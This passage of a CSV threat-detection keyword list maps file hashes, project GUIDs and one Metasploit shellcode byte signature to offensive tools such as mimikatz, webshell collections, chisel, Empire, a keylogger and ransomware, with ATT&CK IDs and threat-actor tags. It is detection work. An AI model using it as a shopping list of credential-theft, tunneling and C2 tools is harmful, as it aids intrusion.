"*fb949f56cdf4e529d69565be537d248f369f54f4fcceeff2f04a82e9f778bc36*",".{0,1000}fb949f56cdf4e529d69565be537d248f369f54f4fcceeff2f04a82e9f778bc36.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44507"
"*fb9a347d266e2e75fc1dd9f66e2bbb661069771458a8638c8c4c7a114bb52f05*",".{0,1000}fb9a347d266e2e75fc1dd9f66e2bbb661069771458a8638c8c4c7a114bb52f05.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44509"
"*FB9B5E61-7C34-4280-A211-E979E1D6977F*",".{0,1000}FB9B5E61\-7C34\-4280\-A211\-E979E1D6977F.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44510"
"*fba90278c07ff36e8f4958fbe66bad409a65639acebbba7297f53ced7283a369*",".{0,1000}fba90278c07ff36e8f4958fbe66bad409a65639acebbba7297f53ced7283a369.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44513"
"*f-bader/TokenTacticsV2*",".{0,1000}f\-bader\/TokenTacticsV2.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","44514"
"*fbb4a1a49a0683247e83da8d2ccd4bdab51516a0a5cacbf6ff759213792e58e2*",".{0,1000}fbb4a1a49a0683247e83da8d2ccd4bdab51516a0a5cacbf6ff759213792e58e2.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","#filehash","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","44516"
"*fbbb6062b35a604ec6a6cf0fd8f8cf298fc6a0551108bfdf4a65c8a03aa92fce*",".{0,1000}fbbb6062b35a604ec6a6cf0fd8f8cf298fc6a0551108bfdf4a65c8a03aa92fce.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44519"
"*fbbc07b9b6d448c80d5bb8a086d715631b78e30eb10cb850601317b21256fb8d*",".{0,1000}fbbc07b9b6d448c80d5bb8a086d715631b78e30eb10cb850601317b21256fb8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44520"
"*fbbc434d1fedd6fdd2cc93714c98293284536dd68b58645db0ebec5c3cb375bb*",".{0,1000}fbbc434d1fedd6fdd2cc93714c98293284536dd68b58645db0ebec5c3cb375bb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","44521"
"*fbc365a2b37cfa4b84000867c83be11fdd9137b97485f1286efd469a07907240*",".{0,1000}fbc365a2b37cfa4b84000867c83be11fdd9137b97485f1286efd469a07907240.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","44522"
"*fbc6438df3960d925a5d2d4880ce806ac26a73a063c66e3804ff7de9046b354b*",".{0,1000}fbc6438df3960d925a5d2d4880ce806ac26a73a063c66e3804ff7de9046b354b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44523"
"*fbcbcfae5662f9f0dfbf7f5cb31c052399382232a51554197f4554d1bb06332f*",".{0,1000}fbcbcfae5662f9f0dfbf7f5cb31c052399382232a51554197f4554d1bb06332f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44524"
"*fbd0e54fedad58bf67971c40fcf7326684a2ec8c882cb14b27ac0ffb9a1fa60b*",".{0,1000}fbd0e54fedad58bf67971c40fcf7326684a2ec8c882cb14b27ac0ffb9a1fa60b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44525"
"*fbd415807cca02732e2b7b7ad2d8fd09db1ab75953fe24fe7b6238f691c6e5a8*",".{0,1000}fbd415807cca02732e2b7b7ad2d8fd09db1ab75953fe24fe7b6238f691c6e5a8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44526"
"*fbd9f058f3838363b1f6f3e63b22ae60532af2f21f5c73b18899c9b0b888e3f3*",".{0,1000}fbd9f058f3838363b1f6f3e63b22ae60532af2f21f5c73b18899c9b0b888e3f3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","44527"
"*fbe18d97dcbd4ee2b6d3d9457142595613cb86a3f59fc7a54f52731925e5026e*",".{0,1000}fbe18d97dcbd4ee2b6d3d9457142595613cb86a3f59fc7a54f52731925e5026e.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#filehash","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","44529"
"*fbe35bdcceb19b3c20e8a212a5a6fa853e9d452321b75da7bbbb7666631c6dc4*",".{0,1000}fbe35bdcceb19b3c20e8a212a5a6fa853e9d452321b75da7bbbb7666631c6dc4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","44530"
"*fbe48841312643343af444c95bbc251c9e5dd6a40c784ea238ec9761e0886895*",".{0,1000}fbe48841312643343af444c95bbc251c9e5dd6a40c784ea238ec9761e0886895.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","44531"
"*fbebaaf3a90be35d2e00d1edf45b98799357f9321ff1b94ccfd2a22e44203052*",".{0,1000}fbebaaf3a90be35d2e00d1edf45b98799357f9321ff1b94ccfd2a22e44203052.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44532"
"*fbee25dd2d6b1faf917f4f6a90113e3c520125f325915b7dd70f304dd2dab4b1*",".{0,1000}fbee25dd2d6b1faf917f4f6a90113e3c520125f325915b7dd70f304dd2dab4b1.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","#filehash","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","44533"
"*fbf810fe9b9d5d4e0e2c8bb919d1c6cdfb80531815e06dacfa1bc13320fc136d*",".{0,1000}fbf810fe9b9d5d4e0e2c8bb919d1c6cdfb80531815e06dacfa1bc13320fc136d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44535"
"*FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 48 31 D2 51 65 48 8B 52 60 48 8B 52 18 48 8B 52 20*",".{0,1000}FC\s48\s83\sE4\sF0\sE8\sCC\s00\s00\s00\s41\s51\s41\s50\s52\s48\s31\sD2\s51\s65\s48\s8B\s52\s60\s48\s8B\s52\s18\s48\s8B\s52\s20.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","#content","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44536"
"*fc03035a9a7e7147f4a61fba442fcbbdc1a56e90880b731aa7c16909381296e0*",".{0,1000}fc03035a9a7e7147f4a61fba442fcbbdc1a56e90880b731aa7c16909381296e0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44537"
"*fc04cd7b616aa8a43a35a5318a9454f4228c74b056bfa07ec14105d249593e35*",".{0,1000}fc04cd7b616aa8a43a35a5318a9454f4228c74b056bfa07ec14105d249593e35.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44538"
"*fc0ceb113a9dd259d3f8029f0304e4be3ba72376a1d55b101b87b8d9e9b3a11a*",".{0,1000}fc0ceb113a9dd259d3f8029f0304e4be3ba72376a1d55b101b87b8d9e9b3a11a.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","#filehash","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","44539"
"*fc0e69e5c2f4ed4cfb830ebb66ba54a86ce95a114603a5fffa42cea8caf3e864*",".{0,1000}fc0e69e5c2f4ed4cfb830ebb66ba54a86ce95a114603a5fffa42cea8caf3e864.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44540"
"*fc1b0c344766d70255be2cf421039e8f20476ea852f1ab081e81b525cfd989fb*",".{0,1000}fc1b0c344766d70255be2cf421039e8f20476ea852f1ab081e81b525cfd989fb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44541"
"*fc1c5daf562d06aed9ffd945fb2766c5cf81318c685357444739926b47bcab1e*",".{0,1000}fc1c5daf562d06aed9ffd945fb2766c5cf81318c685357444739926b47bcab1e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44542"
"*fc1ca88117a5a0328991e63be9340c949d22a25f53134d04c1ffc7be2ed69e6a*",".{0,1000}fc1ca88117a5a0328991e63be9340c949d22a25f53134d04c1ffc7be2ed69e6a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44543"
"*fc22650b89b63d52f14ec5d17c0ee92b1d897825c6b7eb3db391e18268567d25*",".{0,1000}fc22650b89b63d52f14ec5d17c0ee92b1d897825c6b7eb3db391e18268567d25.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","#filehash","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","44545"
"*fc3a3a947cac65214572d9cc2ca8e46401e28f7645cdefca61ef37b3ac95541e*",".{0,1000}fc3a3a947cac65214572d9cc2ca8e46401e28f7645cdefca61ef37b3ac95541e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44548"
"*fc3b2d828651918334e05b57bf4f3c0990d545ac90c9aa062bf0042d70c2d55a*",".{0,1000}fc3b2d828651918334e05b57bf4f3c0990d545ac90c9aa062bf0042d70c2d55a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44549"
"*fc4be26d47f3987e20a033c7284632b138b9b05779eef26458e234ace63d67bc*",".{0,1000}fc4be26d47f3987e20a033c7284632b138b9b05779eef26458e234ace63d67bc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44553"
"*fc5011d77f51cfb7b2fc68ad652b1857670eccdf7327ae31ed1dd6d7c59b3ebb*",".{0,1000}fc5011d77f51cfb7b2fc68ad652b1857670eccdf7327ae31ed1dd6d7c59b3ebb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44554"
"*fc5174e15f2021575ed3f96a79a316e92146e3869020d00220fb608497b422a0*",".{0,1000}fc5174e15f2021575ed3f96a79a316e92146e3869020d00220fb608497b422a0.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","44555"
"*fc52dac4f484c090d99d8b142ed41ed3368938955dfc25d76cd4f290bb6c59d5*",".{0,1000}fc52dac4f484c090d99d8b142ed41ed3368938955dfc25d76cd4f290bb6c59d5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44556"
"*fc53dedfa564864e96ebf7839232e0c3b998070479e5c25cb5351f4613e5dbef*",".{0,1000}fc53dedfa564864e96ebf7839232e0c3b998070479e5c25cb5351f4613e5dbef.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44557"
"*fc5559338c0ade4db54d8d511db5fe0962340177667dcacc071dcdcb956312f4*",".{0,1000}fc5559338c0ade4db54d8d511db5fe0962340177667dcacc071dcdcb956312f4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44558"
"*FC5A1C5A-65B4-452A-AA4E-E6DCF1FA04FB*",".{0,1000}FC5A1C5A\-65B4\-452A\-AA4E\-E6DCF1FA04FB.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","44559"
"*fc5d03fa8fedd73efabd7066cfc4bbeb4777788c8a88301a5a27011239c6f994*",".{0,1000}fc5d03fa8fedd73efabd7066cfc4bbeb4777788c8a88301a5a27011239c6f994.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44561"
"*fc62634b7cdf7a2397165512a48feafc25c2f1e80d7579dfca7e8a773c58a5c3*",".{0,1000}fc62634b7cdf7a2397165512a48feafc25c2f1e80d7579dfca7e8a773c58a5c3.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","44564"
"*fc77b7dc19250416baf67ae9f87e85ebad700032b0d437c0bc2176b2585fca95*",".{0,1000}fc77b7dc19250416baf67ae9f87e85ebad700032b0d437c0bc2176b2585fca95.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44568"
